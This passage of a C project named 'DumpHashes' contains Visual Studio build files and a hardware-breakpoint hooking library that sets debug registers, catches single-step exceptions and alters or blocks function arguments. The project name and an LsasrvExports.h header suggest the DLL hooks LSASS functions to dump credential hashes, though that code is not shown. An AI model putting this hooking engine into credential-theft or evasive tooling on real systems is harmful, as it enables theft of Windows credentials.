 73 |   <PropertyGroup Label="UserMacros" />
 74 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 75 |     <ClCompile>
 76 |       <WarningLevel>Level3</WarningLevel>
 77 |       <SDLCheck>true</SDLCheck>
 78 |       <PreprocessorDefinitions>WIN32;_DEBUG;DUMPHASHES_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 79 |       <ConformanceMode>true</ConformanceMode>
 80 |       <PrecompiledHeader>Use</PrecompiledHeader>
 81 |       <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
 82 |     </ClCompile>
 83 |     <Link>
 84 |       <SubSystem>Windows</SubSystem>
 85 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 86 |       <EnableUAC>false</EnableUAC>
 87 |       <ModuleDefinitionFile>Source.def</ModuleDefinitionFile>
 88 |     </Link>
 89 |   </ItemDefinitionGroup>
 90 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 91 |     <ClCompile>
 92 |       <WarningLevel>Level3</WarningLevel>
 93 |       <FunctionLevelLinking>true</FunctionLevelLinking>
 94 |       <IntrinsicFunctions>true</IntrinsicFunctions>
 95 |       <SDLCheck>true</SDLCheck>
 96 |       <PreprocessorDefinitions>WIN32;NDEBUG;DUMPHASHES_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 97 |       <ConformanceMode>true</ConformanceMode>
 98 |       <PrecompiledHeader>Use</PrecompiledHeader>
 99 |       <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
100 |     </ClCompile>
101 |     <Link>
102 |       <SubSystem>Windows</SubSystem>
103 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
104 |       <OptimizeReferences>true</OptimizeReferences>
105 |       <GenerateDebugInformation>true</GenerateDebugInformation>
106 |       <EnableUAC>false</EnableUAC>
107 |       <ModuleDefinitionFile>Source.def</ModuleDefinitionFile>
108 |     </Link>
109 |   </ItemDefinitionGroup>
110 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
111 |     <ClCompile>
112 |       <WarningLevel>Level3</WarningLevel>
113 |       <SDLCheck>true</SDLCheck>
114 |       <PreprocessorDefinitions>_DEBUG;DUMPHASHES_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
115 |       <ConformanceMode>true</ConformanceMode>
116 |       <PrecompiledHeader>NotUsing</PrecompiledHeader>
117 |       <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
118 |     </ClCompile>
119 |     <Link>
120 |       <SubSystem>Windows</SubSystem>
121 |       <GenerateDebugInformation>false</GenerateDebugInformation>
122 |       <EnableUAC>false</EnableUAC>
123 |       <ModuleDefinitionFile>Source.def</ModuleDefinitionFile>
124 |     </Link>
125 |   </ItemDefinitionGroup>
126 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
127 |     <ClCompile>
128 |       <WarningLevel>Level3</WarningLevel>
129 |       <FunctionLevelLinking>true</FunctionLevelLinking>
130 |       <IntrinsicFunctions>true</IntrinsicFunctions>
131 |       <SDLCheck>true</SDLCheck>
132 |       <PreprocessorDefinitions>NDEBUG;DUMPHASHES_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
133 |       <ConformanceMode>true</ConformanceMode>
134 |       <PrecompiledHeader>NotUsing</PrecompiledHeader>
135 |       <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
136 |     </ClCompile>
137 |     <Link>
138 |       <SubSystem>Windows</SubSystem>
139 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
140 |       <OptimizeReferences>true</OptimizeReferences>
141 |       <GenerateDebugInformation>false</GenerateDebugInformation>
142 |       <EnableUAC>false</EnableUAC>
143 |       <ModuleDefinitionFile>Source.def</ModuleDefinitionFile>
144 |     </Link>
145 |   </ItemDefinitionGroup>
146 |   <ItemGroup>
147 |     <ClCompile Include="DllMain.c" />
148 |     <ClCompile Include="HardwareBreakingLib.c" />
149 |     <ClCompile Include="Log.c" />
150 |   </ItemGroup>
151 |   <ItemGroup>
152 |     <ClInclude Include="HardwareBreakingLib.h" />
153 |     <ClInclude Include="Log.h" />
154 |     <ClInclude Include="LsasrvExports.h" />
155 |     <ClInclude Include="Structs.h" />
156 |   </ItemGroup>
157 |   <ItemGroup>
158 |     <None Include="Source.def" />
159 |   </ItemGroup>
160 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
161 |   <ImportGroup Label="ExtensionTargets">
162 |   </ImportGroup>
163 | </Project>


--------------------------------------------------------------------------------
/DumpHashes/DumpHashes.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClCompile Include="DllMain.c">
19 |       <Filter>Source Files</Filter>
20 |     </ClCompile>
21 |     <ClCompile Include="HardwareBreakingLib.c">
22 |       <Filter>Source Files</Filter>
23 |     </ClCompile>
24 |     <ClCompile Include="Log.c">
25 |       <Filter>Source Files</Filter>
26 |     </ClCompile>
27 |   </ItemGroup>
28 |   <ItemGroup>
29 |     <ClInclude Include="HardwareBreakingLib.h">
30 |       <Filter>Header Files</Filter>
31 |     </ClInclude>
32 |     <ClInclude Include="Structs.h">
33 |       <Filter>Header Files</Filter>
34 |     </ClInclude>
35 |     <ClInclude Include="Log.h">
36 |       <Filter>Header Files</Filter>
37 |     </ClInclude>
38 |     <ClInclude Include="LsasrvExports.h">
39 |       <Filter>Header Files</Filter>
40 |     </ClInclude>
41 |   </ItemGroup>
42 |   <ItemGroup>
43 |     <None Include="Source.def">
44 |       <Filter>Source Files</Filter>
45 |     </None>
46 |   </ItemGroup>
47 | </Project>


--------------------------------------------------------------------------------
/DumpHashes/DumpHashes.vcxproj.user:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 |   <PropertyGroup />
4 | </Project>


--------------------------------------------------------------------------------
/DumpHashes/HardwareBreakingLib.c:
--------------------------------------------------------------------------------
  1 | #include <Windows.h>
  2 | #include <tlhelp32.h>
  3 | 
  4 | #include "Structs.h"
  5 | #include "HardwareBreakingLib.h"
  6 | #include "Log.h"
  7 | 
  8 | //---------------------------------------------------------------------------------------------------------------------------------------------------------
  9 | //---------------------------------------------------------------------------------------------------------------------------------------------------------
 10 | 
 11 | #pragma section(".text")
 12 | __declspec(allocate(".text")) const unsigned char ucRet[] = { 0xC3 };
 13 | 
 14 | VOID BLOCK_REAL(IN PCONTEXT pThreadCtx) 
 15 | {
 16 | 	pThreadCtx->Rip = (ULONG_PTR)&ucRet;
 17 | }
 18 | 
 19 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------
 20 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------
 21 | 
 22 | 
 23 | PBYTE GetFunctionArgument(IN PCONTEXT pThreadCtx, IN DWORD dwParmIndex) {
 24 | 
 25 | 	// The first 4 arguments in x64 are in the "RCX - RDX - R8 - R9" registers
 26 | 	switch (dwParmIndex) {
 27 | 		case 0x01:
 28 | 			return (ULONG_PTR)pThreadCtx->Rcx;
 29 | 		case 0x02:
 30 | 			return (ULONG_PTR)pThreadCtx->Rdx;
 31 | 		case 0x03:
 32 | 			return (ULONG_PTR)pThreadCtx->R8;
 33 | 		case 0x04:
 34 | 			return (ULONG_PTR)pThreadCtx->R9;
 35 | 		default:
 36 | 			break;
 37 | 	}
 38 | 
 39 | 	// Else more arguments are pushed to the stack
 40 | 	return *(ULONG_PTR*)(pThreadCtx->Rsp + (dwParmIndex * sizeof(PVOID)));
 41 | }
 42 | 
 43 | VOID SetFunctionArgument(IN PCONTEXT pThreadCtx, IN ULONG_PTR uValue, IN DWORD dwParmIndex) {
 44 | 
 45 | 	// The first 4 arguments in x64 are in the "RCX - RDX - R8 - R9" registers
 46 | 	switch (dwParmIndex) {
 47 | 		case 0x01:
 48 | 			(ULONG_PTR)pThreadCtx->Rcx = uValue; return;
 49 | 		case 0x02:
 50 | 			(ULONG_PTR)pThreadCtx->Rdx = uValue; return;
 51 | 		case 0x03:
 52 | 			(ULONG_PTR)pThreadCtx->R8 = uValue; return;
 53 | 		case 0x04:
 54 | 			(ULONG_PTR)pThreadCtx->R9 = uValue; return;
 55 | 		default:
 56 | 			break;
 57 | 	}
 58 | 
 59 | 	// Else more arguments are pushed to the stack
 60 | 	*(ULONG_PTR*)(pThreadCtx->Rsp + (dwParmIndex * sizeof(PVOID))) = uValue;
 61 | }
 62 | 
 63 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------
 64 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------
 65 | //													HELPER FUNCTIONS
 66 | 
 67 | DWORD _GetCurrentProcessId() 
 68 | {
 69 | 	return (DWORD)(__readgsdword(0x40));
 70 | }
 71 | 
 72 | DWORD _GetCurrentThreadId() 
 73 | {
 74 | 	return (DWORD)(__readgsdword(0x48));
 75 | }
 76 | 
 77 | HANDLE _GetProcessHeap() 
 78 | {
 79 | 	PPEB pPeb = (PPEB)(__readgsqword(0x60));
 80 | 	return (HANDLE)pPeb->ProcessHeap;
 81 | }
 82 | 
 83 | 
 84 | unsigned long long SetDr7Bits(unsigned long long CurrentDr7Register, int StartingBitPosition, int NmbrOfBitsToModify, unsigned long long NewBitValue) 
 85 | {
 86 | 	unsigned long long mask = (1UL << NmbrOfBitsToModify) - 1UL;
 87 | 	unsigned long long NewDr7Register = (CurrentDr7Register & ~(mask << StartingBitPosition)) | (NewBitValue << StartingBitPosition);
 88 | 	return NewDr7Register;
 89 | }
 90 | 
 91 | 
 92 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------
 93 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------
 94 | //												GLOBAL VARIABLES
 95 | 
 96 | 
 97 | CRITICAL_SECTION						g_HookingCriticalSection				= { 0 };
 98 | HARDWARE_ENGINE_INIT_SETTINGS_GLOBAL	GlobalHardwareBreakpointObject			= { 0 };
 99 | DESCRIPTOR_ENTRY*						g_Head									= NULL;
100 | 
101 | 
102 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------
103 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------
104 | //												PRIVATE FUNCTIONS PROTOTYPES
105 | 
106 | BOOL SetHardwareBreakpoint(IN DWORD ThreadId, IN PUINT_VAR_T Address, IN DRX Drx, IN BOOL bInitializeHWBP);
107 | LONG ExceptionHandlerCallbackRoutine(IN PEXCEPTION_POINTERS ExceptionInfo);
108 | BOOL SnapshotInsertHardwareBreakpointHookIntoTargetThread(IN PUINT_VAR_T Address, IN DRX Drx, IN BOOL bInitializeHWBP, IN DWORD ThreadId);
109 | 
110 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------
111 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------
112 | 
113 | 
114 | BOOL InitHardwareBreakpointHooking() 
115 | {
116 | 
117 | 	if (GlobalHardwareBreakpointObject.IsInit)
118 | 		return TRUE;
119 | 
120 | 	RtlSecureZeroMemory(&GlobalHardwareBreakpointObject, sizeof(HARDWARE_ENGINE_INIT_SETTINGS_GLOBAL));
121 | 	RtlSecureZeroMemory(&g_HookingCriticalSection, sizeof(CRITICAL_SECTION));
122 | 
123 | 	GlobalHardwareBreakpointObject.HandlerObject = AddVectoredExceptionHandler(1, (PVECTORED_EXCEPTION_HANDLER)ExceptionHandlerCallbackRoutine);
124 | 	if (!GlobalHardwareBreakpointObject.HandlerObject) {
125 | 		DBGPRINTF(L"[!] AddVectoredExceptionHandler Failed: %d\n", GetLastError());
126 | 		return FALSE;
127 | 	}
128 | 
129 | 	InitializeCriticalSection(&g_HookingCriticalSection);
130 | 
131 | 	GlobalHardwareBreakpointObject.IsInit = TRUE;
132 | 
133 | 	return TRUE;
134 | }
135 | 
136 | 
137 | BOOL CleapUpHardwareBreakpointHooking() 
138 | {
139 | 
140 | 	DESCRIPTOR_ENTRY* TempObject = NULL;
141 | 
142 | 	if (!GlobalHardwareBreakpointObject.IsInit)
143 | 		return TRUE;
144 | 
145 | 	EnterCriticalSection(&g_HookingCriticalSection);
146 | 
147 | 	TempObject = g_Head;
148 | 
149 | 	while (TempObject != NULL)
150 | 	{
151 | 		RemoveHardwareBreakingPntHook(TempObject->Address, TempObject->ThreadId);
152 | 		TempObject = TempObject->Next;
153 | 	}
154 | 
155 | 	LeaveCriticalSection(&g_HookingCriticalSection);
156 | 
157 | 	if (GlobalHardwareBreakpointObject.HandlerObject)
158 | 		RemoveVectoredExceptionHandler(GlobalHardwareBreakpointObject.HandlerObject);
159 | 
160 | 	DeleteCriticalSection(&g_HookingCriticalSection);
161 | 
162 | 	GlobalHardwareBreakpointObject.IsInit = FALSE;
163 | 
164 | 	return TRUE;
165 | }
166 | 
167 | 
168 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------
169 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------
170 | 
171 | LONG ExceptionHandlerCallbackRoutine(IN PEXCEPTION_POINTERS ExceptionInfo)
172 | {
173 |     DESCRIPTOR_ENTRY*	TempObject	= { 0 };
174 |     BOOL				bResolved	= FALSE;
175 | 
176 |     if (ExceptionInfo->ExceptionRecord->ExceptionCode != STATUS_SINGLE_STEP)
177 |         goto EXIT_ROUTINE;
178 | 
179 |     EnterCriticalSection(&g_HookingCriticalSection);
180 | 
181 |     TempObject = g_Head;
182 | 
183 |     while (TempObject != NULL){
184 | 
185 | 		if (TempObject->Address == ExceptionInfo->ContextRecord->Rip && !TempObject->Processed) {
186 | 
187 | 			if (TempObject->ThreadId != 0 && TempObject->ThreadId != _GetCurrentThreadId())
188 | 			{
189 | 				TempObject->Processed = TRUE;
190 | 				continue;
191 | 			}
192 | 
193 | 			// 1. Disable hw breakpoint 
194 |             if (!SetHardwareBreakpoint(_GetCurrentThreadId(), TempObject->Address, TempObject->Drx, FALSE))
195 | 				goto EXIT_ROUTINE;
196 | 
197 | 			// 2. Execute the callback (detour function)
198 | 			VOID(*fnHookFunc)(PCONTEXT) = TempObject->CallbackFunction;
199 | 			fnHookFunc(ExceptionInfo->ContextRecord);
200 | 
201 | 			// 3. Enable the hw breakpoint again
202 |             if (!SetHardwareBreakpoint(_GetCurrentThreadId(), TempObject->Address, TempObject->Drx, TRUE))
203 | 				goto EXIT_ROUTINE;
204 | 
205 | 			TempObject->Processed = TRUE;
206 |         }
207 | 
208 | 		TempObject->Processed	= FALSE;
209 |         TempObject				= TempObject->Next;
210 |     }
211 | 
212 |     LeaveCriticalSection(&g_HookingCriticalSection);
213 | 
214 |     bResolved = TRUE;
215 | 
216 | EXIT_ROUTINE:
217 | 
218 |     return (bResolved ? EXCEPTION_CONTINUE_EXECUTION : EXCEPTION_CONTINUE_SEARCH);
219 | }
220 | 
221 | 
222 | 
223 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------
224 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------
225 | 
226 | BOOL SetHardwareBreakpoint(IN DWORD ThreadId, IN PUINT_VAR_T Address, IN DRX Drx, IN BOOL bInitializeHWBP)
227 | {
228 | 	CONTEXT		Context				= { .ContextFlags = CONTEXT_DEBUG_REGISTERS };
229 | 	HANDLE		hThread				= INVALID_HANDLE_VALUE;
230 | 	BOOL		bSuspendedThread	= FALSE;
231 | 	BOOL		bReturn				= FALSE;
232 | 
233 | 
234 | 	if (ThreadId != _GetCurrentThreadId())
235 | 	{
236 | 		if ((hThread = OpenThread(THREAD_SUSPEND_RESUME | THREAD_GET_CONTEXT | THREAD_SET_CONTEXT, FALSE, ThreadId)) == NULL)
237 | 		{
238 | 			DBGPRINTF(L"[!] OpenThread [%ld] Failed: %d\n", __LINE__, GetLastError());
239 | 			goto EXIT_ROUTINE;
240 | 		}
241 | 	}
242 | 	else
243 | 		hThread = ((HANDLE)-2);
244 | 
245 | 
246 | 	if (hThread != ((HANDLE)-2)) 
247 | 	{
248 | 		if (SuspendThread(hThread) == ((DWORD)-1))
249 | 		{
250 | 			DBGPRINTF(L"[!] SuspendThread [%ld] Failed: %d\n", __LINE__, GetLastError());
251 | 			goto EXIT_ROUTINE;
252 | 		}
253 | 
254 | 		bSuspendedThread = TRUE;
255 | 	}
256 | 
257 | 	if (!GetThreadContext(hThread, &Context)) 
258 | 	{
259 | 		DBGPRINTF(L"[!] GetThreadContext [%ld] Failed: %d\n", __LINE__, GetLastError());
260 | 		goto EXIT_ROUTINE;
261 | 	}
262 | 
263 | 	if (bInitializeHWBP) 
264 | 	{
265 | 		(&Context.Dr0)[Drx] = Address;
266 | 		Context.Dr7			= SetDr7Bits(Context.Dr7, (Drx * 2), 1, 1);
267 | 	}
268 | 	else 
269 | 	{
270 | 		if ((&Context.Dr0)[Drx] == Address){
271 | 			(&Context.Dr0)[Drx] = 0ull;
272 | 			Context.Dr7			= SetDr7Bits(Context.Dr7, (Drx * 2), 1, 0);
273 | 		}
274 | 	}
275 | 
276 | 	if (!SetThreadContext(hThread, &Context)) 
277 | 	{
278 | 		DBGPRINTF(L"[!] SetThreadContext [%ld] Failed: %d\n", __LINE__, GetLastError());
279 | 		goto EXIT_ROUTINE;
280 | 	}
281 | 	
282 | 	bReturn = TRUE;
283 | 
284 | EXIT_ROUTINE:
285 | 	if (bSuspendedThread)
286 | 	{
287 | 		if (ResumeThread(hThread) == ((DWORD)-1))
288 | 			DBGPRINTF(L"[!] ResumeThread [%ld] Failed: %d\n", __LINE__, GetLastError());
289 | 	}
290 | 	if (hThread && hThread != ((HANDLE)-2))
291 | 		CloseHandle(hThread);
292 | 	return bReturn;
293 | }
294 | 
295 | 
296 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------
297 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------
298 | 
299 | 
300 | #define STATUS_SUCCESS              0x00000000
301 | #define STATUS_INFO_LENGTH_MISMATCH 0xC0000004
302 | 
303 | typedef NTSTATUS(WINAPI* fnNtQuerySystemInformation)(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);
304 | 
305 | 
306 | BOOL SnapshotInsertHardwareBreakpointHookIntoTargetThread(IN PUINT_VAR_T Address, IN DRX Drx, IN BOOL bInitializeHWBP, IN DWORD ThreadId)
307 | {
308 | 	
309 | 	fnNtQuerySystemInformation		pNtQuerySystemInformation	= NULL;
310 | 	ULONG							uReturnLen1					= NULL,
311 | 									uReturnLen2					= NULL;
312 | 	PSYSTEM_PROCESS_INFORMATION		SystemProcInfo				= NULL;
313 | 	DWORD64							dw64AllocatedSize			= INITIAL_ALLOCATION_SIZE;
314 | 	PVOID							pValueToFree				= NULL;
315 | 	NTSTATUS						STATUS						= NULL;
316 | 	BOOL							bResult						= FALSE;
317 | 
318 | 	pNtQuerySystemInformation = (fnNtQuerySystemInformation)GetProcAddress(GetModuleHandle(L"NTDLL.DLL"), "NtQuerySystemInformation");
319 | 	if (pNtQuerySystemInformation == NULL) {
320 | 		DBGPRINTF(L"[!] GetProcAddress [%ld] Failed: %d\n", __LINE__, GetLastError());
321 | 		goto _END_OF_FUNC;
322 | 	}
323 | 
324 | 
325 | 	do {
326 | 	
327 | 		if (SystemProcInfo) 
328 | 		{
329 | 			HeapFree(GetProcessHeap(), 0x00, SystemProcInfo);
330 | 			SystemProcInfo = NULL;
331 | 		}
332 | 	
333 | 		if (!(SystemProcInfo = (PSYSTEM_PROCESS_INFORMATION)HeapAlloc(_GetProcessHeap(), HEAP_ZERO_MEMORY, (SIZE_T)dw64AllocatedSize))) 
334 | 		{
335 | 			DBGPRINTF(L"[!] HeapAlloc [%ld] Failed: %d\n", __LINE__, GetLastError());
336 | 			goto _END_OF_FUNC;
337 | 		}
338 | 
339 | 		if ((STATUS = pNtQuerySystemInformation(SystemProcessInformation, SystemProcInfo, dw64AllocatedSize, &uReturnLen1)) != STATUS_SUCCESS && STATUS != STATUS_INFO_LENGTH_MISMATCH) {
340 | 			DBGPRINTF(L"[!] NtQuerySystemInformation Failed (1): 0x%0.8X\n", STATUS);
341 | 			goto _END_OF_FUNC;
342 | 		}
343 | 
344 | 		dw64AllocatedSize *= 2;
345 | 
346 | 	} while (STATUS == STATUS_INFO_LENGTH_MISMATCH);
347 | 
348 | 	
349 | 	pValueToFree = SystemProcInfo;
350 | 	
351 | 	while (TRUE) {
352 | 
353 | 		
354 | 		if (SystemProcInfo->UniqueProcessId == _GetCurrentProcessId()) {
355 | 		
356 | 			PSYSTEM_THREAD_INFORMATION      SystemThreadInfo	= (PSYSTEM_THREAD_INFORMATION)SystemProcInfo->Threads;
357 | 
358 | 			for (DWORD i = 0; i < SystemProcInfo->NumberOfThreads; i++) {
359 | 				
360 | 				if (ThreadId != ALL_THREADS && ThreadId != SystemThreadInfo[i].ClientId.UniqueThread)
361 | 					continue;
362 | 
363 | 				if (!SetHardwareBreakpoint(SystemThreadInfo[i].ClientId.UniqueThread, Address, Drx, bInitializeHWBP)) 
364 | 				{
365 | 					DBGPRINTF(L"[!] SetHardwareBreakpoint Failed On Thread: %ld\n", SystemThreadInfo[i].ClientId.UniqueThread);
366 | 					// Ignore the error and continue
367 | 					//\
368 | 					goto _END_OF_FUNC;
369 | 				}
370 | 			}
371 | 
372 | 			break;
373 | 		}
374 | 
375 | 		if (!SystemProcInfo->NextEntryOffset)
376 | 			break;
377 | 
378 | 		SystemProcInfo = (PSYSTEM_PROCESS_INFORMATION)((ULONG_PTR)SystemProcInfo + SystemProcInfo->NextEntryOffset);
379 | 	}
380 | 
381 | 	bResult = TRUE;
382 | 
383 | _END_OF_FUNC:
384 | 	if (pValueToFree)
385 | 		HeapFree(_GetProcessHeap(), 0, pValueToFree);
386 | 	return bResult;
387 | }
388 | 
389 | 
390 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------
391 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------
392 | 
393 | 
394 | BOOL InstallHardwareBreakingPntHook(IN PUINT_VAR_T Address, IN DRX Drx, IN PVOID CallbackRoutine, IN DWORD ThreadId)
395 | {
396 | 	DESCRIPTOR_ENTRY*	NewEntry	= NULL;
397 | 
398 | 	if ((NewEntry = (DESCRIPTOR_ENTRY*)HeapAlloc(_GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(DESCRIPTOR_ENTRY))) == NULL) 
399 | 	{
400 | 		DBGPRINTF(L"[!] HeapAlloc [%ld] Failed: %d\n", __LINE__, GetLastError());
401 | 		return FALSE;
402 | 	}
403 | 	
404 | 	EnterCriticalSection(&g_HookingCriticalSection);
405 | 
406 | 	NewEntry->Address								= Address;
407 | 	NewEntry->Drx									= Drx;
408 | 	NewEntry->ThreadId								= ThreadId;
409 | 	NewEntry->CallbackFunction						= CallbackRoutine;
410 | 	NewEntry->Next									= g_Head;
411 | 	NewEntry->Previous								= NULL;
412 | 
413 | 	if (g_Head != NULL)
414 | 		g_Head->Previous = NewEntry;
415 | 
416 | 	g_Head = NewEntry;
417 | 
418 | 	LeaveCriticalSection(&g_HookingCriticalSection);
419 | 
420 | 	return SnapshotInsertHardwareBreakpointHookIntoTargetThread(Address, Drx, TRUE, ThreadId);
421 | }
422 | 
423 | 
424 | BOOL RemoveHardwareBreakingPntHook(IN PUINT_VAR_T Address, IN DWORD ThreadId)
425 | {
426 | 	DESCRIPTOR_ENTRY*	TempObject	= NULL;
427 | 	enum DRX			Drx			= -1;
428 | 	BOOL				bResult		= FALSE,
429 | 						Found		= FALSE;
430 | 
431 | 	EnterCriticalSection(&g_HookingCriticalSection);
432 | 
433 | 	TempObject = g_Head;
434 | 
435 | 	while (TempObject != NULL)
436 | 	{
437 | 		if (TempObject->Address == Address && TempObject->ThreadId == ThreadId)
438 | 		{
439 | 			Found = TRUE;
440 | 
441 | 			Drx = TempObject->Drx;
442 | 
443 | 			if (g_Head == TempObject)
444 | 				g_Head = TempObject->Next;
445 | 
446 | 			if (TempObject->Next != NULL)
447 | 				TempObject->Next->Previous = TempObject->Previous;
448 | 
449 | 			if (TempObject->Previous != NULL)
450 | 				TempObject->Previous->Next = TempObject->Next;
451 | 
452 | 			//if (TempObject)
453 | 			//	HeapFree(_GetProcessHeap(), HEAP_ZERO_MEMORY, TempObject);
454 | 		}
455 | 
456 | 		if (TempObject)
457 | 			TempObject = TempObject->Next;
458 | 	}
459 | 
460 | 	LeaveCriticalSection(&g_HookingCriticalSection);
461 | 
462 | 	if (Found)
463 | 		bResult = SnapshotInsertHardwareBreakpointHookIntoTargetThread(Address, Drx, FALSE, ThreadId);
464 | 
465 | 	return bResult;
466 | }
467 | 
468 | 
469 | 
470 | //------------------------------------------------------------------------------------------------------------------------------------------------------
471 | //------------------------------------------------------------------------------------------------------------------------------------------------------
472 | 


--------------------------------------------------------------------------------
/DumpHashes/HardwareBreakingLib.h:
--------------------------------------------------------------------------------
  1 | #include <Windows.h>
  2 | 
  3 | #ifndef HARDWARE_BP
  4 | #define HARDWARE_BP
  5 | 
  6 | 
  7 | //---------------------------------------------------------------------------------------------------------------------------------------------------------
  8 | //---------------------------------------------------------------------------------------------------------------------------------------------------------
  9 | //	PRIVATE
 10 | 
 11 | #define INITIAL_ALLOCATION_SIZE 0x1000							// 4KB
 12 | #define ALL_THREADS				0x00
 13 | 
 14 | 
 15 | typedef uintptr_t PUINT_VAR_T;
 16 | 
 17 | typedef struct __HARDWARE_ENGINE_INIT_SETTINGS_GLOBAL {
 18 | 	PVOID	HandlerObject;
 19 | 	BOOL	IsInit;
 20 | }HARDWARE_ENGINE_INIT_SETTINGS_GLOBAL, * PHARDWARE_ENGINE_INIT_SETTINGS_GLOBAL;
 21 | 
 22 | typedef enum _DRX
 23 | {
 24 | 	Dr0,
 25 | 	Dr1,
 26 | 	Dr2,
 27 | 	Dr3
 28 | 
 29 | }DRX, * PDRX;
 30 | 
 31 | 
 32 | typedef struct DESCRIPTOR_ENTRY {
 33 | 	PUINT_VAR_T					Address;		
 34 | 	enum DRX					Drx;			
 35 | 	DWORD						ThreadId;		
 36 | 	VOID(*CallbackFunction)(PCONTEXT);			
 37 | 	BOOL						Processed;		
 38 | 	struct DESCRIPTOR_ENTRY*	Next;			
 39 | 	struct DESCRIPTOR_ENTRY*	Previous;		
 40 | }DESCRIPTOR_ENTRY, * PDESCRIPTOR_ENTRY;
 41 | 
 42 | PBYTE	GetFunctionArgument(IN PCONTEXT pThreadCtx, IN DWORD dwParmIndex);
 43 | VOID	SetFunctionArgument(IN PCONTEXT pThreadCtx, IN ULONG_PTR uValue, IN DWORD dwParmIndex);
 44 | 
 45 | //---------------------------------------------------------------------------------------------------------------------------------------------------------
 46 | //---------------------------------------------------------------------------------------------------------------------------------------------------------
 47 | 
 48 | // Resume the execution of the original function
 49 | // This should always be called from the detour function
 50 | #define CONTINUE_EXECUTION(CTX)(CTX->EFlags = CTX->EFlags | (1 << 16))
 51 | 
 52 | // Set a return value
 53 | #define RETURN_VALUE(CTX, VALUE)((ULONG_PTR)CTX->Rax = (ULONG_PTR)VALUE)
 54 | 
 55 | // Block the execution of the original function
 56 | VOID BLOCK_REAL(IN PCONTEXT pThreadCtx);
 57 | 
 58 | // Get Parameters
 59 | #define GETPARM_1(CTX)(GetFunctionArgument(CTX, 0x1))	
 60 | #define GETPARM_2(CTX)(GetFunctionArgument(CTX, 0x2))
 61 | #define GETPARM_3(CTX)(GetFunctionArgument(CTX, 0x3))
 62 | #define GETPARM_4(CTX)(GetFunctionArgument(CTX, 0x4))
 63 | #define GETPARM_5(CTX)(GetFunctionArgument(CTX, 0x5))
 64 | #define GETPARM_6(CTX)(GetFunctionArgument(CTX, 0x6))
 65 | #define GETPARM_7(CTX)(GetFunctionArgument(CTX, 0x7))
 66 | #define GETPARM_8(CTX)(GetFunctionArgument(CTX, 0x8))
 67 | #define GETPARM_9(CTX)(GetFunctionArgument(CTX, 0x9))
 68 | #define GETPARM_A(CTX)(GetFunctionArgument(CTX, 0xA))
 69 | #define GETPARM_B(CTX)(GetFunctionArgument(CTX, 0xB))
 70 | 
 71 | // Set Parameters
 72 | #define SETPARM_1(CTX, VALUE)(SetFunctionArgument(CTX, VALUE, 0x1))
 73 | #define SETPARM_2(CTX, VALUE)(SetFunctionArgument(CTX, VALUE, 0x2))
 74 | #define SETPARM_3(CTX, VALUE)(SetFunctionArgument(CTX, VALUE, 0x3))
 75 | #define SETPARM_4(CTX, VALUE)(SetFunctionArgument(CTX, VALUE, 0x4))
